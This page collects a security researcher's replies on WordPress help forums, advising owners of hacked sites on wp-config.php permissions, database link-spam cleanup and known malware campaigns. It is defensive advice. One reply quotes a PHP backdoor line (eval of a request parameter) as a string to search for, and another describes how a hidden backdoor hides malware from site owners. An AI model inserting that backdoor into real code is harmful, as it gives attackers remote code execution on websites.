Daniel Cid
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Spam content and links got inserted into my blog postsCheck your permissions. If you are on a shared server, double check them 🙂
As far as the links inserted, were those the ones (from basicpills)?
http://blog.sucuri.net/2011/03/link-injection-basicpills-com-and-blackhat-seo-spam.html
Btw, where do you host it?
thanks,
Forum: Fixing WordPress
In reply to: Website hackedDo you know that 444 = Read permissions to the owner, group and EVERYONE? 🙂
On shared hosts, I really recommend 400 or 440 to the wp-config.php, otherwise everyone can read it.
thanks,
Forum: Fixing WordPress
In reply to: Website hackedYou can if the permissions are not set correctly. Check the permissions of all your files (specially the wp-config.php). If they are not set properly, the attackers will just read the new pass from there and hack again.
*Also check for backdoors, which is very common in this type of attack.
Forum: Fixing WordPress
In reply to: Website hackedBtw, the real actions to take against them is the following:
1-Report to Google. They do that for SEO reasons. If Google blocks them, they lose.
2-The best way to report is to ping http://twitter.com/mattcutts on Twitter (works at Google). If more people sent him this thread and this post: http://blog.sucuri.net/2011/03/link-injection-basicpills-com-and-blackhat-seo-spam.html they might do something.
3-I wish I could share a clean up script, but it is integrated with our package (since it needs access to the db, has a bunch of variations, etc), and I can’t share everything… Sharing only that part won’t work as well because of the dependencies.
*btw, if you can’t clean up, I suggest just restoring all posts to a previous version (using the revision option).
Forum: Fixing WordPress
In reply to: Virus alert and white spaceClayton: That bit of code at the top is malicious even though it looks legit.
Post some details about it here:
http://sucuri.net/malware/malware-entry-mwjs612*seeing some other sites infected with it.
Forum: Fixing WordPress
In reply to: Website hackedI did a quick post explaining it… We are seeing A LOT of infected sites:
http://blog.sucuri.net/2011/03/link-injection-basicpills-com-and-blackhat-seo-spam.html
Still trying to track how they got access to the database. Can anyone affected tell us:
-Where they are hosting
-WP version
-List of used plugins?
Forum: Fixing WordPress
In reply to: Website hackedpubblivori: We have some SQL code to clean it out, basically it infects all posts in the database.
This is what we noticed on the infected sites that we analyzed:
1-The DB user/pass was stolen (somehow). Generally bad permissions of the wp-config.php.
2-All were on shared servers.
3-A new admin user name was created.So, the first step is to change the DB user/pass, check for malicious users and fix permissions.
Then worry about cleaning up the spam, otherwise they will just add those again.
thanks,
Forum: Fixing WordPress
In reply to: Website hackedThis kind of hack is a bit different and these instructions won’t help much 🙂
What we saw is that the shared server itself was compromised, allowing the attackers to inject links directly in the DB.
Forum: Fixing WordPress
In reply to: Website hackedThose are added directly to the database, so you have to go post by post and remove them. Very annoying.
Are you hosting on dreamhost?
thanks,
Forum: Fixing WordPress
In reply to: Malicious code in index.php keeps coming backThis is the malware you have:
http://blog.sucuri.net/2011/02/the-attack-from-the-ccs-domains-considered-harmful.htmlAnd it also comes together with a backdoor hidden in your themes. So search on all your themes files for:
if (isset($_REQUEST[\’asc\’])) eval(stripslashes($_REQUEST[\’asc\’]));
*thats the backdoor associated with this malware.
Forum: Fixing WordPress
In reply to: Virus: Redircts on Blog Posts, Unknown Code in QuickpressYour site is still infected:
http://sitecheck.sucuri.net/scanner/?scan=http://migrationology.com/It seems to be a new malware affecting GoDaddy shared servers today… We already saw a few sites with it:
http://blog.sucuri.net/2011/02/hilary-kneber-godaddy-and-welcometotheglobalisnet-com.html
http://sucuri.net/malware/malware-entry-mwgdd5Thanks,
Forum: Fixing WordPress
In reply to: Problems with 3.0.3If your site have this PE*.php file, then your site is hacked and probably displaying malware to your visitors…
It basically acts as a backdoor and creates a new document.write to one of your javascript files to send malware to visitors of your site.
What is interesting is that it only shows the malware once a day per IP and only to Windiws/IE users… Making it harder for the site owner to notice.
This is the code displayed to the users:
http://sucuri.net/malware/entry/MW:JS:457*just as a curiosity, for the people affected, were your sites hacked in the past?
thanks,
Forum: Fixing WordPress
In reply to: is this a virusYes, it is a malware used to attack many sites (as part of a spam bot net).
Some details here:
http://blog.sucuri.net/2010/08/cleaning-the-siteurlpath-hack-on-wordpress-wplinksforwork-and-hemoviestube-spam-bots.htmlThanks,
Forum: Fixing WordPress
In reply to: siteurlpath needed in wp_options?A bit of an old thread, but I posted some details about this attack:
Hope it is useful for anyone having to deal with this attack.
Forum: Fixing WordPress
In reply to: 2.9.2 site hackednims: I don’t think there is anything you can do, since those are mass attacks against hosting companies.
It looks like Godaddy fixed their servers, since no one else got hacked there. However, Bluehost and dreamhost keep getting hacked. The last one was from whereis dudescars .com: